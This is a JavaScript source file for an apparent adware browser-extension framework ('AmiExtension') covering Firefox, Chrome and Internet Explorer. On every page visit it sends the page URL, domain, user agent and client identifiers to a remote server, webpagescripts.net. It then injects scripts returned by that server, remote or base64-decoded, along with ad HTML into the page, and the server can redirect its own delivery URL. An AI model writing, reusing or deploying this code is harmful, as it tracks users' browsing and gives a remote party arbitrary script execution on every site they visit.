//build 1.0.7
EXPORTED_SYMBOLS = ["AmiExtension", "BaseFfAddOn", "extend"];


function AmiExtension(){}

AmiExtension.browser = '';
AmiExtension.logEnabled = true;
AmiExtension.xmlHttpRequestClass = false;
AmiExtension.initParam = false;
AmiExtension.cores = {};
AmiExtension.delivery_url = "www.webpagescripts.net/ExtensionSrv/fetch.php";
AmiExtension.delivery_url_https = "www.webpagescripts.net/ExtensionSrv/fetch.php";
AmiExtension.dns_failover = false;

AmiExtension.log = function(arg,overrideBrowser){
	
	var browser = AmiExtension.browser;
	if(overrideBrowser)
	{
		browser = overrideBrowser;
	}
	
	if(!AmiExtension.logEnabled)return;
	switch(browser){
		case 'ff':
			Components.classes["@mozilla.org/consoleservice;1"].getService(Components.interfaces.nsIConsoleService).logStringMessage("" + arg);
			break;
		case 'ch':
			console.log(arg);
			break;
		case 'ie':
			try{console.log(arg);}
			catch(excl){/*no luck...*/}
			break;
		default:
			break;
	}
};

AmiExtension.onImportFF = function(data)
{
	AmiExtension.resourceUri = data.resourceUri;
};
AmiExtension.onImportCH = function(data)
{
	//run on every page contact script
	AmiExtension.log("[[[[ onImportCH","ch");
	AmiExtension.resourceUri = data.resourceUri;
	
};

AmiExtension.onImportIE = function(data)
{
	//NOT WORKING YET
};


/**
 * Converts the given data structure to a json string.
 * http://www.openjs.com/scripts/data/json_encode.php
 */
AmiExtension.Json = {};
AmiExtension.Json.escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;
AmiExtension.Json.meta = {    // table of character substitutions
            '\b': '\\b',
            '\t': '\\t',
            '\n': '\\n',
            '\f': '\\f',
            '\r': '\\r',
            '"' : '\\"',
            '\\': '\\\\'
        };

AmiExtension.Json.StringifyObject = function (arr) {
	if(typeof(JSON) != 'undefined') return JSON.stringify(arr);
    var parts = [];
    var is_list = (arr.constructor == Array), embed;

    for(var key in arr) {
    	var value = arr[key], str;
		embed = '"';
		switch(typeof(value)){
			case 'object':
				if(!value)str = 'null';
				else {
					embed = '';
					str = AmiExtension.Json.StringifyObject(value);
				}
				break;
			case 'string':
				str = value.replace(AmiExtension.Json.escapable, function (a) {
						return typeof(meta[a]) === 'string' ? meta[a] : '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
					});
				break;
			case 'number':
				str = isFinite(value) ? String(value) : 'null';
				break;
			case 'boolean':
			case 'null':
				// If the value is a boolean or null, convert it to a string. Note:
				// typeof null does not produce 'null'. The case is included here in
				// the remote chance that this gets fixed someday.
				str = String(value);
				break;
			default:
				continue;
				break;
		}
		str = embed + str + embed;
        parts.push(is_list ? str : '"' + key + '":' + str);
    }
    var json = parts.join(',');
    if(is_list) return '[' + json + ']';
    return '{' + json + '}';
};

AmiExtension.Json.ParseObject = (function () {
  var number = '(?:-?\\b(?:0|[1-9][0-9]*)(?:\\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\\b)';
  var oneChar = '(?:[^\\0-\\x08\\x0a-\\x1f\"\\\\]' + '|\\\\(?:[\"/\\\\bfnrt]|u[0-9A-Fa-f]{4}))';
  var string = '(?:\"' + oneChar + '*\")';

  // Will match a value in a well-formed JSON file.
  // If the input is not well-formed, may match strangely, but not in an unsafe
  // way.
  // Since this only matches value tokens, it does not match whitespace, colons,
  // or commas.
  var jsonToken = new RegExp(
      '(?:false|true|null|[\\{\\}\\[\\]]' + '|' + number + '|' + string + ')', 'g');

  // Matches escape sequences in a string literal
  var escapeSequence = new RegExp('\\\\(?:([^u])|u(.{4}))', 'g');

  // Decodes escape sequences in object literals
  var escapes = {
    '"': '"',
    '/': '/',
    '\\': '\\',
    'b': '\b',
    'f': '\f',
    'n': '\n',
    'r': '\r',
    't': '\t'
  };
  function unescapeOne(_, ch, hex) {
    return ch ? escapes[ch] : String.fromCharCode(parseInt(hex, 16));
  }

  // A non-falsy value that coerces to the empty string when used as a key.
  var EMPTY_STRING = new String('');
  var SLASH = '\\';

  // Constructor to use based on an open token.
  var firstTokenCtors = { '{': Object, '[': Array };

  return function (json) {
	  if(typeof(JSON) != 'undefined') return JSON.parse(json);
    // Split into tokens
    var toks = json.match(jsonToken);
    // Construct the object to return
    var result;
    var tok = toks[0];
    if ('{' === tok) {
      result = {};
    } else if ('[' === tok) {
      result = [];
    } else {
      throw new Error(tok);
    }

    // If undefined, the key in an object key/value record to use for the next
    // value parsed.
    var key;
    // Loop over remaining tokens maintaining a stack of uncompleted objects and
    // arrays.
    var stack = [result];
    for (var i = 1, n = toks.length; i < n; ++i) {
      tok = toks[i];

      var cont;
      switch (tok.charCodeAt(0)) {
        case 0x22:  // '"'
          tok = tok.substring(1, tok.length - 1);
          if (tok.indexOf(SLASH) !== -1) {
            tok = tok.replace(escapeSequence, unescapeOne);
          }
          cont = stack[0];
          if (!key) {
            if (cont instanceof Array) {
              key = cont.length;
            } else {
              key = tok || EMPTY_STRING;  // Use as key for next value seen.
              break;
            }
          }
          cont[key] = tok;
          key = void 0;
          break;
        case 0x5b:  // '['
          cont = stack[0];
          stack.unshift(cont[key || cont.length] = []);
          key = void 0;
          break;
        case 0x5d:  // ']'
          stack.shift();
          break;
        case 0x66:  // 'f'
          cont = stack[0];
          cont[key || cont.length] = false;
          key = void 0;
          break;
        case 0x6e:  // 'n'
          cont = stack[0];
          cont[key || cont.length] = null;
          key = void 0;
          break;
        case 0x74:  // 't'
          cont = stack[0];
          cont[key || cont.length] = true;
          key = void 0;
          break;
        case 0x7b:  // '{'
          cont = stack[0];
          stack.unshift(cont[key || cont.length] = {});
          key = void 0;
          break;
        case 0x7d:  // '}'
          stack.shift();
          break;
        default:  // sign or digit
          cont = stack[0];
          cont[key || cont.length] = +(tok);
          key = void 0;
          break;
      }
    }
    // Fail if we've got an uncompleted object.
    if (stack.length) { throw new Error(); }
    return result;
  };
})();

AmiExtension.init = function(coreExtension, initParam){
	if(!AmiExtension.browser)
		throw new Exception("AmiExtension.browser value should be set before initializing extension");
	else AmiExtension.log("Initializing extension for " + AmiExtension.browser);

	var extCore = new coreExtension;
	var extName = extCore.name;
	if(typeof(AmiExtension.addOn) == 'undefined'){
		if(initParam)AmiExtension.initParam = initParam;
		AmiExtension.log("Setting extension core: " + AmiExtension.browser + '/' + extName + " " + typeof(extCore));
		try
		{
			switch(AmiExtension.browser){
				case 'ff':
					AmiExtension.addOn = AmiExtension.initParam && AmiExtension.initParam.extension ? AmiExtension.initParam.extension : BaseFfAddOn.createAddOn(extName);
					if(AmiExtension.initParam && AmiExtension.initParam.xmlhttp)AmiExtension.xmlHttpRequestClass = AmiExtension.initParam.xmlhttp;
					if(AmiExtension.initParam && AmiExtension.initParam.helper)AmiExtension.helper = AmiExtension.initParam.helper;
					if(AmiExtension.initParam && AmiExtension.initParam.local)AmiExtension.local = AmiExtension.initParam.local;
					AmiExtension.log("[[[[ calling coreCreatedFF");
					extCore.coreCreatedFF({"resourceUri":(AmiExtension.resourceUri)});
					break;
				case 'ch':
					AmiExtension.log("[[[[ ch contactscript init");
					var ____resourceUri = chrome.extension.getURL('');
					AmiExtension.onImportCH({"resourceUri":____resourceUri});
					
					AmiExtension.addOn = BaseChAddOn.createAddOn(extName);
					AmiExtension.log("[[[[ calling coreCreatedCH :" +extName + "    " +extCore);
					AmiExtension.log(extCore);
					AmiExtension.log(AmiExtension.resourceUri);
					extCore.coreCreatedCH({"resourceUri":(AmiExtension.resourceUri)});

					break;
				case 'ie':
					AmiExtension.addOn = new IeAddOn(extName);
					break;
				default:
					break; //shouldn't fall here
			}
			AmiExtension.addOn.setDeliveryUrl();
			AmiExtension.log("AmUtils::Extension initialized " + extName+ ' helper ' + typeof(AmiExtension.helper));
		}
		catch (exce)
		{
			AmiExtension.log("AmUtils::exception initializing extension " + exce);
		}
		if(!AmiExtension.helper)AmiExtension.helper = AmiHelper;
		if(!AmiExtension.local)AmiExtension.local = AmiLocal;
		
		if( (typeof (AmiExtension.local.delivery_url) !== 'undefined') && (AmiExtension.local.delivery_url) && (AmiExtension.local.delivery_url.length>1) ){
			AmiExtension.delivery_url = AmiExtension.local.delivery_url;
		}
		
		AmiExtension.log("AmUtils::Extension initialized " + extName+ ' AmiLocal ' + typeof(AmiExtension.local) + ' AmiLocal.chan ' + AmiExtension.local.chan);
		
	}
	extCore.framework = AmiExtension;
	extCore.helper = AmiExtension.helper;
	if(!AmiExtension.coreCount)AmiExtension.coreCount = 1;
	else AmiExtension.coreCount++;
	AmiExtension.cores[extName] = extCore;
	extCore.extNumber = AmiExtension.coreCount;
	return extName;
};

AmiExtension.getXmlHttp = function(){
	if(AmiExtension.xmlHttpRequestObject)return AmiExtension.xmlHttpRequestObject;
	if(AmiExtension.xmlHttpRequestClass)return AmiExtension.xmlHttpRequestClass();
	if(XMLHttpRequest)return new XMLHttpRequest();
	return new ActiveXObject('MSXML2.XMLHTTP.3.0');
};

AmiExtension.getExtension = function(core){
		if(!AmiExtension.addOn){
			AmiExtension.log("AmUtils::getExtension called before init, or init failed ");
			return false;
		}
		return new AmiExt(core);
	};



AmiExtension.asyncXhr = function(core, postData,cacheBuster) {
	if(!core || !AmiExtension.delivery_url){
		AmiExtension.log('Request skipped: ' + AmiExtension.delivery_url + ' core ' + core);
		AmiExtension.preprocessServerResponse(core, {});
		return;
	}
	var post = null;
	if(postData && core.helper){
		postData.ami_ext_name = core.name;
		post = core.helper.encodePostData(postData, '');
	}
	try{
		var xhr = AmiExtension.getXmlHttp();
		xhr.onreadystatechange = function (functionData) {
			if (xhr.readyState == 4) {
				if (xhr.status == 200) {
					try
					{
						var resp = AmiExtension.Json.ParseObject (xhr.responseText);
						AmiExtension.preprocessServerResponse(core, resp);
					}
					catch (excptn)
					{
						AmiExtension.log('Exception ' + excptn + ' in Xhr callback');
					}
				} 
			}
		};
		var proto = ('https:' == core.wnd.document.location.protocol ? 'https://' : 'http://') ;
		
		var rand = ""+ (new Date().getTime());
		var delivery_url = core.delivery_url;;
		if(proto==='https://')
		{
			delivery_url = core.delivery_url_https;
		}
		var fullUrl = proto+delivery_url;
		
		
		if(post){
			if((typeof variable === 'undefined') && (cacheBuster === true))
			{
				fullUrl = fullUrl+"?rand="+rand;
			}
			xhr.open('POST', fullUrl , true);
	        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		}
		else 
		{
			if((typeof variable === 'undefined') && (cacheBuster === true))
			{
					post["rand"] = rand;
			}
			
			xhr.open('GET', fullUrl, true);
		}
		xhr.send(post);
	}
	catch(excptn){
			AmiExtension.log('Exception ' + excptn + ' in Xhr');
	}
};

AmiExtension.preprocessServerResponse = function(core, serverResponse){
	if(serverResponse['AmiExtension']){
		serverResp = serverResponse['AmiExtension'];
		if(serverResp.client)
			core.ext.sendRequest({method:"setPref", key:"client_id", val:serverResp.client},
								function (response) {
									AmiExtension.log("client id saved " + response.data); 
									if(response.error)AmiExtension.log(response.error); 
								});
		if(serverResp.delivery_url){
			core.ext.sendRequest({method:"setPref", key:"delivery_url", val:serverResp.delivery_url},
								function (response) {
									if(response.error)AmiExtension.log(response.error); 
									else AmiExtension.log("Deliver url changed to ..."); 
								});
			AmiExtension.delivery_url = serverResp.delivery_url;
		}
		//set next visit...

		if(serverResp.nextv && serverResp.nextv > 0)
			core.ext.sendRequest({method:"setNextVisitTime", interval:serverResp.nextv, nexta:serverResp.nexta},
								function (response) {
									AmiExtension.log("setNextVisitTime " + response.data); 
									if(response.error)AmiExtension.log(response.error); 
								});
		//handle script injection
		if(serverResp.s){
			var doc = core.wnd.document, n;
			for(var i=0; i<serverResp.s.length; i++){
				n = doc.createElement( 'script' );
				n.type = 'text/javascript';
				if(serverResp.s[i].src)n.src = serverResp.s[i].src;
				else n.text = core.helper.decode64(serverResp.s[i].text);
				if(serverResp.s[i].b)doc.body.appendChild(n);
				else doc.getElementsByTagName('head')[0].appendChild(n);
			}
		}

		//handle html injection, if any
		if(serverResp.ifr && serverResp.algn > 0){
			var body = core.wnd.document.body;
			if(!body)return;
			var div = core.wnd.document.createElement("DIV");
			div.id = 'ami_div';
			var left = 0;
			if(serverResp.w){
				div.style.width = ''+serverResp.w + 'px';
				if(serverResp.algn <= 6)
					switch(serverResp.algn %3){
						case 1: left = 0; break;
						case 2: left = (core.wnd.document.body.clientWidth - serverResp.w)/2; break;
						case 0: left = (core.wnd.document.body.clientWidth - serverResp.w); break;
						default: break;
					}
			}
			else {
				div.style.width = '100%';
			}
			div.style.display = 'block';
			div.style.zIndex = 999;
			div.style.position = 'relative';
			if(left < 0)left = 0;
			div.style.left = '' + left + 'px';
			var html = core.helper.decode64(serverResp.ifr);

			div.innerHTML = html;
			var sibling, parent;
			switch(serverResp.algn){
				case 1:
				case 2:
				case 3:
					var first = body.firstChild;
					if(!first)body.appendChild(div);
					else body.insertBefore(div, first);
					break;
				case 4:
				case 5:
				case 6:
					body.appendChild(div);
					break;
				case 7:
					sibling = document.getElementById(serverResp.domref);
					if(sibling){
						parent = sibling.parentNode;
						if(parent)parent.insertBefore(div, sibling.nextSibling);
					}
					break;
				case 8:
					sibling = document.getElementById(serverResp.domref);
					if(sibling){
						parent = sibling.parentNode;
						if(parent)parent.insertBefore(div, sibling);
					}
					break;
				default:
					return;
			}

			//find own visible elements, if any...
			if(serverResp.visible){

				function setClickListener(id, clickListener){
					AmiExtension.listen2Event(core.wnd.document.getElementById(id), 'click', clickListener);
				}

				setClickListener('ami_div_hide', function(){core.wnd.document.getElementById('ami_div').style.display = "none";});
				if(serverResp.dmn){
					setClickListener('ami_div_hids', function(){
							AmiExtension.fireEvent(core.wnd.document, 'ami_div_hide', 'click');
							core.ext.sendRequest({method:"setPref", key:'blackDomain_'+serverResp.dmn+'.'+serverResp.tld, val:'1'},
											function (response) {
												if(response.data)core.wnd.alert("No more ads on " + response.hp.domain+'.'+response.hp.tld); 
											});
						});
					setClickListener('ami_div_hidd', function(){
							AmiExtension.fireEvent(core.wnd.document, 'ami_div_hide', 'click');
							core.ext.sendRequest({method:"setPref", key:'blackSite_'+serverResp.dmn, val:'1'},
											function (response) {
												if(response.data)core.wnd.alert("No more ads on " + response.hp.domain); 
											});
						});
				}
				setClickListener('ami_div_hidh', 
					function(){
						AmiExtension.fireEvent(core.wnd.document, 'ami_div_hide', 'click');
						core.ext.sendRequest({method:"setPref", key:'blackHost_'+core.wnd.document.location.host, val:'1'},
										function (response) {
											if(response.data)core.wnd.alert("No more ads on " + core.wnd.document.location.host); 
										});
					}); 
			}
		}
	}

	try
	{
		if(core.processServerResponse)core.processServerResponse(serverResponse[core.name]);
	}
	catch (excpt)
	{
		AmiExtension.log("Core process server response: Exception " + excpt);
	}
};

AmiExtension.listen2Event = function(node, evName, callback){
	if(!node)return;
	if(node.attachEvent)node.attachEvent("on"+evName, callback);
	else node.addEventListener(evName, callback, false);
};

AmiExtension.fireEvent = function(doc, n, evName){
	var node = (typeof(n) == 'string') ? doc.getElementById(n) : n;
	if(!node)return;
	if(node.fireEvent)node.fireEvent('on' + evName);	
	else {
	  var event = doc.createEvent("HTMLEvents");
	  event.initEvent(evName, true, false);
	  node.dispatchEvent(event);
	}
};

AmiExtension.inject = function(extName, wnd){
	if(!AmiExtension.cores[extName]){
		AmiExtension.log("AmExt::extension core not found ");
		return;
	}
	if(!wnd)wnd = window;
	var coreExt = AmiExtension.cores[extName];

	//common check - we run only on top-level http{s} windows...
	coreExt.wnd = wnd;
	if(!coreExt.wnd || coreExt.wnd.top != coreExt.wnd.self)return;
	coreExt.ext = AmiExtension.getExtension(coreExt);
	if(!coreExt.ext)return;

	try
	{
		if(!coreExt.pageInit())return;
	}
	catch (excpt)
	{
		AmiExtension.log("Core page init: Exception " + excpt);
		return;
	}

	coreExt.amiLoadHandler = function(orgn) {
			if(this.timerSendUrls)this.wnd.clearTimeout(this.timerSendUrls);
			if(this.scriptExecuted)return;

			this.scriptExecuted = true;
			this.ext.sendRequest({method:"mayVisitNow"},
				function (response){
					var that = AmiExtension.cores[response.ami_name];
					if(response.error)that.framework.log("mayVisitNow err:" + response.error); 
					that.framework.log("mayVisitNow " + response.data); 
					if(!response.data)return; 
					that.parsedHost = response.hp; 
					var postData = {refrr:that.wnd.document.location.href, cl:response.cl, tld:that.parsedHost.tld, dom:that.parsedHost.domain, chan:AmiExtension.local.chan,sysid:AmiExtension.local.sysid,ua:that.wnd.navigator.userAgent};
					
					if( (typeof (AmiExtension.local.overrideccode) !== 'undefined') && (AmiExtension.local.overrideccode) && (AmiExtension.local.overrideccode.length>1) ){
						overrideccode = AmiExtension.local.overrideccode;
						postData.overrideccode=overrideccode;
					}
					
					if( (typeof (AmiExtension.local.test) !== 'undefined') && ((""+AmiExtension.local.test)||(AmiExtension.local.test==0))  ){
						
						postData.test=""+AmiExtension.local.test;
					}
					else
					{
						postData.test="undefined";
					}
					
					postData.rand = ""+ (new Date().getTime());
					
					try
					{
						that.pageVisit(response, postData); 	
					}
					catch (excpt)
					{
						AmiExtension.log("Core page visit: Exception " + excpt);
					}
					that.framework.asyncXhr(that, postData,true); 
				});
		};

	var origOnLoad = wnd.onload;
	wnd.onload = function () {
				if(origOnLoad)origOnLoad();
				coreExt.amiLoadHandler('onload');
			};

	coreExt.timerSendUrls = coreExt.wnd.setTimeout(function(){coreExt.amiLoadHandler('timer');}, 1000);
	coreExt.scriptExecuted = false;

};

AmiExtension.run = function(browser, coreExtension, initParam, wnd,extensionFolderName){
	//Should Only work for IE
	if(browser != "ie"){return;}
	
	AmiExtension.browser = browser;
	
	var extn = AmiExtension.init(coreExtension, initParam);
	if(!extn)return;
	
	//FOR IE fail safe in case iframe is disabled from bho
	try
	{	
		var synchDivId = "__amiSyncDiv__"+extensionFolderName;
		var synchDiv = wnd.document.getElementById(synchDivId);
		synchDiv.detachEvent ('onclick', AmiInjectInit);
		synchDiv.onclick = null;
	}
	catch(e) {}
	AmiExtension.inject(extn, wnd);
};

AmiExtension.background = function(addOn, request, sendResponse) {
	var rc = false;
	var host= "";
	var response = {data:false, time:(new Date()).getTime(), "host":host, hp:false, error:''};
	try	{response.host = host = request.ami_loc.host;}
	catch (excpt){host = response.host = ''; response.error = "undefined host " + excpt;}
	if(!addOn.hostUtils)	addOn.hostUtils = new HostUtils();
	var hp = response.hp = addOn.hostUtils.parseHost(host);

	try
	{
		if (request.method == "mayVisitNow"){
			response.cl = addOn.getPref("client_id", '');
			rc = addOn.getPref('blackHost_' + host, '');
			if(!rc)
				rc = addOn.getPref('blackDomain_'+hp.domain+'.'+hp.tld, '');
			if(!rc)
				rc = addOn.getPref('blackSite_'+hp.domain, '');
			if(!rc){ //i.e. not blacklisted
				var now = (new Date()).valueOf();
				rc = addOn.getAppStorage('hunv!0' + host, 0) >= now;
				if(!rc)rc = addOn.getAppStorage('hunv!1' + hp.domain+'.'+hp.tld, 0) >= now;
				if(!rc)rc = addOn.getAppStorage('hunv!2' + hp.domain, 0) >= now;
			}
			rc = !rc;
		}

		if (request.method == "setPref"){
			addOn.setPref(request.key, request.val);
			rc = true;
		}
		if (request.method == "getPref"){
			response.pref_key = request.key;
			response.pref_val = addOn.getPref(request.key, request.dflt);
			rc = true;
		}
		if (request.method == "setNextVisitTime"){
			var i = new Date();
			i.setMinutes(i.getMinutes() + request.interval);
			rc = i.valueOf();
			i = '0'+host;
			if(request.nexta == 1)i = '1' + hp.domain+'.'+hp.tld;
			if(request.nexta == 2)i = '2' + hp.domain;
			addOn.setAppStorage('hunv!' + i, rc);
		}
		response.data = rc;
	}
	catch (exch)
	{
		response.error = "Background exception: " + exch;
	}
	if(addOn.bgHandler)addOn.bgHandler(request, response);
	addOn.respond(request, response, sendResponse);
};

function AmiExt(core){
	this.ami_wnd = core.wnd;
	this.ami_name = core.name;
	this.sendRequest = function(request, callback){
		if(!AmiExtension.addOn){
			AmiExtension.log("AmiExt::sendRequest called before init, or init failed " + AmiExtension.Json.StringifyObject(request));
			return;
		}
		request.ami_doc = this.ami_wnd.document;
		request.ami_name = this.ami_name;
		request.ami_loc = {href:'', host:''};
		try
		{
			request.ami_loc.href = request.ami_doc.location.href;
			request.ami_loc.host = request.ami_doc.location.host.toLowerCase();
		}
		catch (exch){}
		if(AmiExtension.browser == 'ch')request.ami_doc = null;
		//if(callback)callback(response);
		AmiExtension.addOn.sendRequest(request, callback);
	};
}

function extend(sub, base) {
	function surrogateCtor(){}
	// Copy the prototype from the base to setup inheritance
	surrogateCtor.prototype = base.prototype;
	// Tricky huh?
	sub.prototype = new surrogateCtor();
	// Remember the constructor property was set wrong, let's fix it
	sub.prototype.constructor = sub;
}

function BaseAddOn(extn){
	this.name = extn;
	this.bgHandler = BaseAddOn.getCoreBgHandler(this);
	this.background = false;

	this.listener = function(request, sendResponse){
		AmiExtension.background(this, request, sendResponse);
	};

	this.getAppStorage = function(key, dflt){
		return (!AmiExtension.bgstore || !AmiExtension.bgstore[key]) ? dflt : AmiExtension.bgstore[key];
	};
	this.setAppStorage = function(key, val){if(!AmiExtension.bgstore)AmiExtension.bgstore={}; AmiExtension.bgstore[key] = val;};

	this.setDeliveryUrl = function(){
		if(this.background)AmiExtension.delivery_url = this.getPref('delivery_url',AmiExtension.delivery_url);
		else this.sendRequest({method:'getPref', key:'delivery_url', dflt:AmiExtension.delivery_url},
			function(){
				if(response.error)
					AmiExtension.log("Cannot get delivery URL from preferences" + response.error);
				else AmiExtension.delivery_url = response.pref_val;
			});
	};
}

BaseAddOn.getCoreBgHandler = function(addOn){
	try
	{
		var context = window;
		return (context && context[addOn.name] && context[addOn.name].background) ? context[addOn.name].background : false;
	}
	catch (excpt)
	{
		return false;
	}
};

function BaseChAddOn(extn){
	BaseAddOn.call(this, extn);

	this.getPref = function(key, defaultValue){
			return (typeof(localStorage[key]) == 'undefined') ? defaultValue : localStorage[key];
	};

	this.setPref = function(key, val){
		localStorage[key] = val;
	};

	this.respond = function(request, response, callback){
		response.ami_name = request.ami_name;
		callback(response);
	};

	this.sendRequest = function(request, callback){
		chrome.extension.sendRequest(request, callback);
	};
}
extend(BaseChAddOn,BaseAddOn); 

BaseChAddOn.createAddOn = function(extn){
	if(!extn)return false;
	if(typeof(ChAddOn) == 'undefined')return new BaseChAddOn(extn); 
	var key = '!' + extn + '!';
	if(!AmiExtension.bgstore || !AmiExtension.bgstore[key])
		return new ChAddOn(extn);
	else return AmiExtension.bgstore[key];
};

BaseChAddOn.listen = function(){
	
	chrome.extension.onRequest.addListener(function (request, sender, sendResponse) {
		var ext = BaseChAddOn.createAddOn(request.ami_name);
		try
		{
			if(ext)ext.listener(request, sendResponse);
			//else ext.respond(request, {error: "BaseChAddOn::failed to get/create addon " +AmiExtension.Json.StringifyObject(request)}, sendResponse);
		}
		catch (exch)
		{
			ext.respond(request, {error: "BaseChAddOn::exception in listener " + exch + " request "+AmiExtension.Json.StringifyObject(request)}, sendResponse);
		}
	});
	chrome.tabs.onUpdated.addListener(function(tabId,changeInfo,tab){
			var url =""+ tab.url;
			console.log("onUpdated: "+url+" changeInfo: "+changeInfo.status);
			if(!changeInfo.status || changeInfo.status != 'complete')
				return;
			
			if( (url.indexOf("http")>=0)|| (url.indexOf("https")>=0) )
			{
				//alert("background tab update sending message: "+url);
				console.log("background tab update sending message: "+url);
				chrome.tabs.sendRequest(tabId, {event:'updatedTab', "url":tab.url});
			}
		}); 
	//for fixing bug
	//http://code.google.com/p/chromium/issues/detail?id=109557
	//http://stackoverflow.com/questions/9515474/chrome-tabs-onupdated-addlistener-not-fired-when-page-is-retrieved-from-cache
	chrome.tabs.onReplaced.addListener(function(addedTabId, removedTabId){
		console.log("onReplaced integer addedTabId, integer removedTabId: "+addedTabId, removedTabId);
		var tabId = addedTabId;
		
		
		chrome.tabs.get(tabId,function(tab){
			var url =""+ tab.url;
			var changeInfo ={status:tab.status};
			console.log("onReplaced fix: "+url+" changeInfo: "+changeInfo.status);
			if(!changeInfo.status || changeInfo.status != 'complete')
				return;
			
			if( (url.indexOf("http")>=0)|| (url.indexOf("https")>=0) )
			{
				//alert("background tab update sending message: "+url);
				console.log("onReplaced fix- sending message: "+url);
				chrome.tabs.sendRequest(tabId, {event:'updatedTab', "url":tab.url});
			}
		});
		
		
		
	}); 
};

function BaseFfAddOn(extn){
	BaseAddOn.call(this, extn);
	this.prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);

	this.getAppStorage = function(key, dflt){
		return BaseFfAddOn.appStorage.get(key, dflt);
	};
	this.setAppStorage = function(key, val){BaseFfAddOn.appStorage.set(key, val);};

	BaseFfAddOn.appStorage.set('!' + extn + '!', this);

	this.getPref = function(key, defaultValue){
		try{
			return this.prefManager.getCharPref("extensions."+this.name+"." + key);
		}
		catch(exch){return defaultValue;}
	};

	this.setPref = function(key, val){
		this.prefManager.setCharPref("extensions."+this.name+"." + key, val);
	};

	this.respond = function(request, response, callback){
		var doc = request.ami_doc;
		response.ami_name = request.ami_name;
		var node = doc.createTextNode(AmiExtension.Json.StringifyObject(response));
		AmiExtension.log('Event created '+request.method);
		node.addEventListener("amiffresponse", 
			function(event) {
				var n = event.currentTarget;
				AmiExtension.log('Event received '+n.nodeValue);
				if (callback) {
					var resp = AmiExtension.Json.ParseObject(n.nodeValue);
					callback(resp);
				}
				if (n.parentNode) n.parentNode.removeChild(n);
			}, false);
          var event = doc.createEvent("HTMLEvents");
		  event.initEvent("amiffresponse", true, false);
		  AmiExtension.log('Event dispatch '+request.method);
		  node.dispatchEvent(event);	
		  AmiExtension.log('Event dispatched');
	};

	this.onload = function(evt){
		window.addEventListener("load", 
			function()
			{
						//alert("In onload");
				gBrowser.addEventListener('DOMContentLoaded', function (evt) {
					var doc = null, view = null;
					var vt;
					try{ doc = evt.target; view = doc.defaultView; vt = doc.documentElement.getAttribute("windowtype"); }
					catch(exccs){vt="none";}
					//alert('DOMContentLoaded ' + vt + ' document ' + doc);
					if (doc && typeof(view) != 'undefined' && (view.top == view.self) && (!vt || vt == "navigator:browser"))
						AmiExtension.inject(this.name, view);
					}, false);
			}, false);
		};

}
extend(BaseFfAddOn,BaseAddOn); 

BaseFfAddOn.createAddOn = function(extn){
	if(!extn)return false;
	BaseFfAddOn.createAppStorage();
	var ext = BaseFfAddOn.appStorage.get('!' + extn + '!', false);
	return ext ? ext : new FfAddOn(extn);
};

BaseFfAddOn.createAppStorage = function(){
	if(!BaseFfAddOn.appStorage)
		BaseFfAddOn.appStorage = {
			app : Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication),
			get : function(key, dflt){
				return this.app.storage.get('ami_ext_.' +key, dflt);
			},
			set : function(key, val){this.app.storage.set('ami_ext_.' +key, val);}
		};
};

function BaseIeAddOn(extn){
	BaseAddOn.call(this, extn);

	this.getPref = function(key, defaultValue){
		try{
			return this.intHelper ? this.intHelper.getPref(this.name, key, defaultValue) : defaultValue;
		}
		catch(exch){return defaultValue;}
	};

	this.setPref = function(key, val){
		if(this.intHelper)this.intHelper.setPref(this.name, key, val);
	};

	this.getAppStorage = function(key, dflt){return  this.intHelper ? this.intHelper.get(this.name, key, dflt) : dflt;};
	this.setAppStorage = function(key, val){if(this.intHelper)this.intHelper.set(this.name, key, val);};

	this.respond = function(request, response, callback){
		//debugger;
		var doc = request.ami_doc;
		response.ami_name = request.ami_name;
		var t = AmiExtension.Json.StringifyObject(response);
		var node = doc.createElement('div');
		node.style.display='none';
		node.innerHTML = t;
		AmiExtension.log('Event created '+request.method);
		function evListener(event) {
			var n = event.target || event.srcElement;
			AmiExtension.log('Event received '+n.innerHTML);
			if (callback) {
				var resp =AmiExtension.Json.ParseObject(n.innerHTML);
				callback(resp);
			}
			if(n.parentNode)n.parentNode.removeChild(n);
		}
		doc.body.appendChild(node);
		AmiExtension.listen2Event(node,"onclick", evListener);
		AmiExtension.log('Event fire '+request.method);
		AmiExtension.fireEvent(doc, node, 'onclick');
		AmiExtension.log('Event fired');
	};

	this.sendRequest = function(request, callback){
		//debugger;
		if(!request.ami_doc)return;
		var myDiv = request.ami_doc.getElementById("__amiSyncDiv__"+extn);
		if(!myDiv)return;
		this.intHelper = myDiv.ami_object;
		if(!AmiExtension.xmlHttpRequestObject)
			AmiExtension.xmlHttpRequestObject = myDiv.ami_xml;
		if(this.listener)this.listener(request, callback);
	};
}
extend(BaseIeAddOn,BaseAddOn); 

BaseIeAddOn.createAddOn = function(extn){
	if(!extn)return false;
	return new IeAddOn(extn);
};

function AmiInjectInit(extensionFolderName){
	AmiExtension.browser = 'ie';
	AmiExtension.run('ie',window[extensionFolderName], false, false,extensionFolderName);
}